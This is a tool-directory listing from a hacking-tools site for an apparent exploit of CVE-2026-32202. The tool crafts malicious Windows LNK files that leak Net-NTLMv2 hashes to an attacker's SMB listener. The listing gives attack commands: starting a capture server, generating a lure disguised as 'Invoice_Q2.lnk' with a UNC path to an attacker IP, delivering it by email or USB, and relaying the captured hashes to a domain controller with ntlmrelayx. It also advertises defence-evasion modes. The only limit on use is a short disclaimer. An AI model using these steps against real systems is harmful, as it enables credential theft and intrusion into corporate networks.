Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Payload GenerationExploitationLateral MovementPenetration TestingRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Generates malicious LNK files to coerce Net-NTLMv2 hashes via Windows Shell UNC handling, with custom SMB listener and relay integration for authorized red team operations.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
3 months agoNot yet reviewed
Share

Disclaimer

This tool is for authorized red teaming and penetration testing only.
Unauthorized use against systems without explicit permission is illegal.
Use at your own risk. The author assumes no liability for any misuse or damage.

Description
NTLMv2 hash coercion via incomplete Windows Shell protection bypass (CVE-2026-32202). Generates specially crafted LNK files that force SMB/UNC authentication on open or preview in Explorer. Low interaction, works on patched systems where the April 2026 fix was insufficient. Actively used in engagements.

Key Features

  • Zero-click / minimal-interaction Net-NTLMv2 leak via malicious LNK (Explorer preview + icon resolution path).
  • Custom SMB listener for hash capture (no Responder needed, cleaner logs).
  • Stable variant with reduced ETW/Defender footprint.
  • Partial AMSI/SmartScreen bypass mode.
  • Ready for ntlmrelayx relay chains (SMB, LDAP, HTTP, etc.).

What the exploit does
The tool creates a crafted .LNK that abuses Shell's handling of UNC paths in Target + IconEnvironmentDataBlock / ExtraData structures. When the victim browses the folder or hovers/previews the file, Windows Shell initiates an SMB connection to the attacker-controlled UNC, leaking the machine/user's Net-NTLMv2 hash. No code execution on target - credential coercion for relay or cracking.

Why it's useful

  • Fast initial access in internal pentests / red team ops (especially air-gapped or hardened envs where phishing is restricted).
  • Perfect for NTLM relay to high-value targets (DCs, file servers, Exchange, ADCS, etc.).
  • Works where classic Responder is blocked or noisy.
  • High success rate on Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (tested builds below).

Tested on

  • Windows 11 24H2 (build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + desktop experience)
  • Partially effective post-April 2026 cumulative update (incomplete patch confirmed in wild).

Dependencies Install: pip install -r requirements.txt

Usage

root@kitploit:~
# 1. Start capture server (attacker host)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. Generate malicious LNK
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# Optional: stable or bypass mode
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. Deliver LNK (USB, share, email attachment, OneDrive, etc.)

# 4. Wait for hash in terminal + file. Example relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# or LDAP relay for RBCD, HTTP for ADCS cert, etc.

Exploit

href

Limitations

  • Requires victim to interact with the containing folder (Explorer preview/hover is usually enough).
  • Modern network segmentation + SMB signing + NTLM restrictions reduce relay success.
  • Not a full RCE - credential material only.
  • Patch status matters; fully updated April 2026+ systems may require the bypass variant.

Root cause (short)
Incomplete fix in Windows Shell's UNC path sanitization and ExtraData block processing for LNK icon/target resolution. The protection mechanism intended to block unauth network spoofing still triggers NTLM auth during Shell namespace enumeration.

Download Tool